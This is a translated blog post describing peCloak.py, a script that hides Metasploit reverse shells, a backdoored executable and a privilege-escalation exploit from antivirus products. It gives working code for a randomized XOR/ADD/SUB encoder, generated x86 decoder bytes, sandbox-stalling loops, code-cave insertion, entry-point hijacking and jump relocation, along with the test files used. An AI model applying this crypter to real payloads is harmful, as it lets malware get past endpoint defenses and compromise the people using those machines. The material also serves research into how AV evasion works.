
0x00 Preface

From: http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

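Before starting, I should point out that this is not an experiment in the strict sense of the word.

The premise is simple: AV detection relies heavily on file signatures, supplemented by application sandboxing and dynamic (heuristic) analysis.

I was therefore confident that modifying parts of an executable and adding a few basic, practical sandbox-bypass techniques would be enough to defeat most client-side AV products.

I set the following conditions:

1. The modified PE file must evade detection by common, fully updated AV products.
2. The encoded payload must run correctly and without errors; a payload that fails to run because AV blocked it counts as a failure.
3. The whole evasion process (encoding, decoding, and so on) must be automated; the code must run without any manual steps or a debugger.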

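0x01 Test environment

A Windows XP SP3 virtual machine and Kali Linux.

Payloads:

Two Metasploit payloads (meterpreter_reverse_tcp and shell_reverse_tcp)
One local privilege escalation exploit (KiTrap0D, aka "vdmallowed")
One executable backdoored with reverse_tcp (strings.exe from Sysinternals)

Each of these was verified to still work after being modified and encoded.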

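0x02 Evasion approach

To evade detection successfully, I identified a few key points.

First, I needed to improve on earlier encoding or encryption routines that are themselves caught by signatures. I also imposed a restriction on myself: the encoder may use only simple xor, add, and sub instructions. This is not because other operations are too complex, but to show that evading signature detection does not require a sophisticated encoder.

Second, I needed to get past the AV product's sandbox inspection and heuristic detection.

Finally, I wanted to minimize the footprint of the decoder and heuristic-bypass code in the executable so that it does not become a signature itself.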

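0x03 peCloak.py

To meet all of these requirements I wrote a Python script called "peCloak". It does what I set out to do, but keep in mind that I spent only about a week on it, so the code still has plenty of room for improvement. I do not intend it as a replacement for the Veil Framework, and I do not plan to maintain it long term. It is a simple automated evasion script, developed as a small part of this experiment. Even so, I hope the methods I used help you understand AV evasion in more depth.

Note that to use the script you must install the following dependencies yourself:

pydasm, pefile, SectionDoubleP

Download: peCloak.py

I will not walk through all of the code in depth (for a beta release, it is already well commented).

Instead, let's look at some of the evasion methods I used.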

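0x04 Encoding

Choosing the encoding scheme matters for avoiding signature detection, and as mentioned, my self-imposed rule was to use only simple add, sub, and xor instructions. To choose the encoding sequence dynamically, I came up with the following very simple function (abridged):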

#!python
import random
from random import randint

def build_encoder():

    encoder = []
    encode_instructions = ["ADD","SUB","XOR"] # possible encode operations
    num_encode_instructions = randint(5,10) # determine the number of encode instructions

    # build the dynamic portion of the encoder
    while (num_encode_instructions > 0):
        modifier = randint(0,255)

        # determine the encode instruction
        encode_instruction = random.choice(encode_instructions)
        encoder.append(encode_instruction + " " + str(modifier))

        num_encode_instructions -= 1

    # ... snip ...

    return encoder

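It meets all of my criteria: the encoding becomes a series of simple operations whose number, order, operators, and modifier values are all randomized.

Encoding happens at run time: the script reads the file contents and encodes the designated section byte by byte. By default it encodes the PE section that contains executable code (for example .text or .code), but this is configurable. The pefile module is used to locate and retrieve the sections.

An abridged version of the encode_data function follows: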

#!python
data_to_encode = retrieve_data(pe, section_name, "virtual") # grab unencoded data from section

# ... snip ...

# generate encoded bytes
count = 0
for byte in data_to_encode:
    byte = int(byte, 16)
    if (count >= encode_offset) and (count < encode_length + encode_offset):
        enc_byte = do_encode(byte, encoder)
    else:
        enc_byte = byte
    count += 1
    encoded_data = encoded_data + "{:02x}".format(enc_byte)

# make target section writeable
make_section_writeable(pe, section_name)

# write encoded data to image
print "[*] Writing encoded data to file"
raw_text_start = section_header.PointerToRawData # get raw text location for writing directly to file
pe.set_bytes_at_offset(raw_text_start, binascii.unhexlify(encoded_data))

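0x05 Decoding

Decoding is also fairly simple: it is just the reverse of encoding. The instructions run in the opposite order (last in, first out), and each instruction is replaced by its inverse (add becomes sub, sub becomes add, xor stays xor). The table below pairs an example encoder with its decoder.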

Encoder	Decoder
ADD 9	SUB 7
SUB 3	XOR 3F
XOR 2E	ADD 1
ADD 12	SUB 12
SUB 1	XOR 2E
XOR 3F	ADD 3
ADD 7	SUB 9

The decoder looks roughly like this:

#!asm
get_address:
   mov eax, decode_start_address     ; Move address of section's first encoded byte into EAX

decode:                              ; assume decode of at least one byte
   ...dynamic decode instructions... ; decode operations + benign fill
   inc eax                           ; increment decode address
   cmp eax, encode_end_address       ; check address with end_address
   jle decode                        ; if in range, loop back to start of decode function
   ...benign filler instructions...  ; additional benign instructions that alter signature of decoder

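To build the decoder I simply used a dictionary that maps each encode operation to its inverse, then looped over the encoder's operations to create the matching decoder. This is necessary because the encoder is generated dynamically each time (and so differs on every run).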

#!python
def build_decoder(pe, encoder, section, decode_start, decode_end):

    decode_instructions = {
        "ADD":"\x80\x28", # add encode w/ corresponding sub decoder ==> SUB BYTE PTR DS:[EAX]
        "SUB":"\x80\x00", # sub encode w/ corresponding add decoder ==> ADD BYTE PTR DS:[EAX]
        "XOR":"\x80\x30"  # xor encode w/ corresponding xor decoder ==> XOR BYTE PTR DS:[EAX]
    }

    decoder = ""
    for i in encoder:
        encode_instruction = i.split(" ")[0] # get encoder operation
        modifier = int(i.split(" ")[1])      # get operation modifier
        decode_instruction = (decode_instructions[encode_instruction] + struct.pack("B", modifier)) # get corresponding decoder instruction
        decoder = decode_instruction + decoder # prepend the decode instruction to execute in reverse order

        # add some fill instructions
        fill_instruction = add_fill_instructions(2)
        decoder = fill_instruction + decoder

    mov_instruct = "\xb8" + decode_start # mov eax, decode_start
    decoder = mov_instruct + decoder # prepend the decoder with the mov instruction
    decoder += "\x40" # inc eax
    decoder += "\x3d" + decode_end # cmp eax, decode_end
    back_jump_value = binascii.unhexlify(format((1 << 16) - (len(decoder)-len(mov_instruct)+2), 'x')[2:]) # TODO: keep the total length < 128 for this short jump
    decoder += "\x7e" + back_jump_value # jle start_of_decode
    decoder += "\x90\x90" # NOPS

    return decoder
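
The `back_jump_value` expression is compact but easy to misread. As a rough illustration (not the author's code; `rel8_back_jump` is a hypothetical helper, written for Python 3), the same value can be produced by packing a signed byte, which also makes the length limit mentioned in the TODO explicit:

```python
import struct

def rel8_back_jump(body_length):
    """Encode a backward short-jump displacement as one signed byte.

    body_length counts the bytes between the jump target and the start of
    the 2-byte jump instruction. The CPU measures the displacement from the
    end of the jump, so 2 more bytes are added.
    """
    displacement = -(body_length + 2)
    if displacement < -128:
        raise ValueError("loop body too long for a short (rel8) jump")
    return struct.pack("b", displacement)

# Same result as the format()/unhexlify() expression for a 30-byte loop body.
hex_trick = bytes.fromhex(format((1 << 16) - (30 + 2), "x")[2:])
assert rel8_back_jump(30) == hex_trick == b"\xe0"
```

In `build_decoder`, the body length corresponds to `len(decoder) - len(mov_instruct)`, so under these assumptions the loop body can be at most 126 bytes before a short jump no longer reaches.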

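0x06 Heuristic bypass

The heuristic bypass is nothing more than a series of instructions executed in loops to stall execution, so that the AV engine believes the executable has already run. NOP, INC/DEC, ADD/SUB, and PUSH/POP instructions are all suitable. As with encoding, a pseudo-random number first determines the order of the filler instructions, which are then paired with an increment and a compare instruction (the loop limit is also chosen at random within a range) to form a finite loop.

The number of loops is set before the script runs; keep in mind that the more loops there are, the longer execution takes.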

#!python
def generate_heuristic(loop_limit):

    fill_limit = 3 # the maximum number of fill instructions to generate in between the heuristic instructions
    heuristic = ""
    heuristic += "\x33\xC0"                                                         # XOR EAX,EAX
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x40"                                                             # INC EAX
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x3D" + struct.pack("<L", loop_limit)                             # CMP EAX,loop_limit ("<L" forces a 4-byte little-endian value)
    short_jump = binascii.unhexlify(format((1 << 16) - (len(heuristic)), 'x')[2:])  # Jump immediately after XOR EAX,EAX
    heuristic += "\x75" + short_jump                                                # JNZ SHORT
    heuristic += add_fill_instructions(fill_limit)                                  # fill
    heuristic += "\x90\x90\x90"                                                     # NOP
    return heuristic

'''
    This is a very basic attempt to circumvent remedial client-side sandbox heuristic scanning
    by stalling program execution for a short period of time (adjustable from options)
'''
def build_heuristic_bypass(heuristic_iterations):

    # we only need to clear these registers once
    heuristic_start = "\x90\x90\x90\x90\x90\x90" # NOPs
    heuristic_start += "\x31\xf6"                # XOR ESI,ESI
    heuristic_start += "\x31\xff"                # XOR EDI,EDI
    heuristic_start += add_fill_instructions(5)

    # compose the various heuristic bypass code segments
    heuristic = ""
    for x in range(0, heuristic_iterations):
        loop_limit = randint(286331153, 429496729)
        heuristic += generate_heuristic(loop_limit) #+ heuristic_xor_instruction
    print "[*] Generated Heuristic bypass of %i iterations" % heuristic_iterations
    heuristic = heuristic_start + heuristic
    return heuristic

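The add_fill_instructions() function called by both the heuristic and the decoder simply picks instructions at random (inc/dec, push/pop, and so on) from a dictionary defined earlier in the script.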

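0x07 Creating the code cave

In the end, the script encodes the designated PE section and then inserts a code cave containing the heuristic bypass and the corresponding decoder. The cave's location is chosen at run time by searching each PE section for a minimum number of consecutive null bytes (currently 1000). If such a run is found, the script marks that section executable and inserts the code there. Otherwise it creates a new section (named ".NewSection") using the SectionDoubleP code. You can also use the -a | -add option to insert the code into an existing section (which may corrupt the file).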

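0x08 Jumping to the code cave

To jump into the code cave, the PE file's execution flow is changed by modifying the instructions at ModuleEntryPoint. Two points need attention:

1. The jump instruction must be built with the address of the code cave created earlier.
2. The original instructions at ModuleEntryPoint must be preserved so that the program's original behavior is unaffected.

The function that handles the second point is relatively simple: it uses the pydasm library to read the instructions at the entry point and obtain their disassembly.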

#!python
def preserve_entry_instructions(pe, ep, ep_ava, offset_end):
    offset=0
    original_instructions = pe.get_memory_mapped_image()[ep:ep+offset_end+30]
    print "[*] Preserving the following entry instructions (at entry address %s):" % hex(ep_ava)
    while offset < offset_end:
        i = pydasm.get_instruction(original_instructions[offset:], pydasm.MODE_32)
        asm = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
        print "\t[+] " + asm
        offset += i.length

    # re-get instructions with confirmed offset to avoid partial instructions
    original_instructions = pe.get_memory_mapped_image()[ep:ep+offset]
    return original_instructions

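An important property of this function is that it preserves whole instructions. For example, suppose the entry point begins with:

6A 60              PUSH 60
68 28DF4600        PUSH pe.0046DF28

If the jump to your code cave overwrites 5 bytes, you need to preserve all 7 bytes of the first two instructions; otherwise the second instruction is split and the leftover bytes are garbage.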
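
The boundary rule can be stated without a disassembler. The following sketch (Python 3; `bytes_to_preserve` is a hypothetical helper, and the instruction lengths are supplied by hand rather than obtained from pydasm) mirrors the `while offset < offset_end` loop: keep consuming whole instructions until the overwritten region is covered.

```python
def bytes_to_preserve(instruction_lengths, overwrite_size):
    """Return how many bytes of whole instructions cover the overwrite."""
    offset = 0
    for length in instruction_lengths:
        if offset >= overwrite_size:
            break  # the overwritten region is already covered
        offset += length
    if offset < overwrite_size:
        raise ValueError("not enough instructions to cover the overwrite")
    return offset

# PUSH 60 is 2 bytes and PUSH pe.0046DF28 is 5 bytes; a 5-byte overwrite
# ends in the middle of the second instruction, so both are kept.
assert bytes_to_preserve([2, 5], 5) == 7
```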

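0x09 Restoring execution flow

At this point, the entry point holds a jump to the code cave. The cave runs the heuristic bypass and then decodes the encoded parts of the PE file. Once that is done, execution must return to where it originally started so that the file runs as intended. This takes two steps:

1. Re-execute the original instructions that were overwritten.
2. Jump back to the section's entry point, offset by the size of the added jump.

Re-executing the original instructions gets complicated when they include relative jump/call instructions, because those targets must be recalculated relative to their new location in the code cave.

I solved this by recomputing each relative jump from its original destination address and its current address in the code cave.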

#!python
current_address = int(code_cave_address, 16) + heuristic_decoder_offset + prior_offset + added_bytes

# check opcode to see if it's a relative conditional or unconditional jump
if opcode in conditional_jump_opcodes:
    new_jmp_loc = update_jump_location(asm, current_address, 6)
    new_instruct_bytes = conditional_jump_opcodes[opcode] + struct.pack("<l", new_jmp_loc) # replace short jump with long jump and update location
elif opcode in unconditional_jump_opcodes:
    new_jmp_loc = update_jump_location(asm, current_address, 5)
    new_instruct_bytes = unconditional_jump_opcodes[opcode] + struct.pack("<l", new_jmp_loc) # replace short jump with long jump and update location
else:
    new_instruct_bytes = instruct_bytes

The conditional_jump_opcodes and unconditional_jump_opcodes variables simply hold the respective opcodes. The update_jump_location function is also simple:

#!python
def update_jump_location(asm, current_address, instruction_offset):
    jmp_abs_destination = int(asm.split(" ")[1], 16) # get the intended destination
    # A relative displacement is measured from the end of the jump instruction,
    # so one formula covers both directions: the result is negative for a
    # backwards jump and positive for a forwards jump.
    new_jmp_loc = jmp_abs_destination - (current_address + instruction_offset)

    return new_jmp_loc
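
A worked example may make the displacement arithmetic concrete. This is a sketch only: the addresses are invented, `rel32` is a hypothetical helper, and it is written for Python 3. On x86, a near jump's displacement is relative to the address of the next instruction, that is, the jump's own address plus its length.

```python
import struct

def rel32(instruction_address, instruction_length, destination):
    """Displacement for a near jump, measured from the end of the instruction."""
    return destination - (instruction_address + instruction_length)

# Hypothetical addresses: a 5-byte JMP at 0x00471000 back to 0x00401234.
backward = rel32(0x00471000, 5, 0x00401234)
encoded = b"\xe9" + struct.pack("<l", backward)  # E9 = JMP rel32

# Adding the displacement to the end of the instruction recovers the target.
assert 0x00471000 + 5 + backward == 0x00401234

# A 6-byte conditional near jump (0F 8x rel32) going forwards works the same way.
forward = rel32(0x00401000, 6, 0x00402000)
assert forward > 0 > backward
```

The instruction lengths 5 and 6 correspond to the values passed to `update_jump_location` for unconditional and conditional jumps respectively.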

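0x10 Other features

As with most things I build, there are a few extras, so I added some other features to help analyze the target file. For example, during testing I sometimes wanted to view part of a PE file to work out what was triggering signature detection, so I added a simple hex/text viewer.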

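0x11 Saving the modified PE file

As I noted in an earlier write-up, I had to modify the pefile library slightly to get what I needed from my changes. In particular, while looking through its issues I found that when pefile saves a modified file, it overwrites some bytes with the section structure data. In other words, if you modify the first 50 bytes of a file's .rdata section, your changes are replaced by the original section header. To address this, I added an extra parameter (SizeofHeaders) to pefile's write() function so that I can preserve the PE header and still replace the parts I want.

Strings get overwritten in the same way, so I made one more change to write().

Depending on how extensively you modify a file, further changes may be needed, although these two were enough for my simple tests.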

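0x12 Further notes & conclusion

If you want to reproduce this with peCloak or your own tool, the notes below cover the peCloak options I used, plus a few things to keep in mind:

* First, I have not included a screenshot of every scan result as proof of evasion, since that would make this article far too long, although I do show one example result.
* Second, most of the byte ranges I chose for encoding are not optimized. For example, encoding bytes 0 through 500 of the .rdata section causes evasion to fail even though the file still runs normally. I did not investigate which bytes cause the failure and leave that as an exercise for the reader.
* Finally, when I refer to peCloak's default settings, I mean a heuristic bypass level of 3 (-H 3) with only the .text section encoded. This is what you get when you run the script with no additional options.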

As a reminder, these are the four files used in testing:

av_test_msfmet_rev_tcp.exe – Metasploit Meterpreter reverse_tcp executable
av_test_msfshell_rev_tcp.exe – Metasploit reverse tcp shell executable
strings_evil.exe – strings.exe backdoored with Metasploit reverse_tcp exploit
vdmallowed.exe – local Windows privilege escalation exploit

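The first three files were generated directly with Metasploit and the fourth was compiled from source; none of them were processed with any tool other than peCloak.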
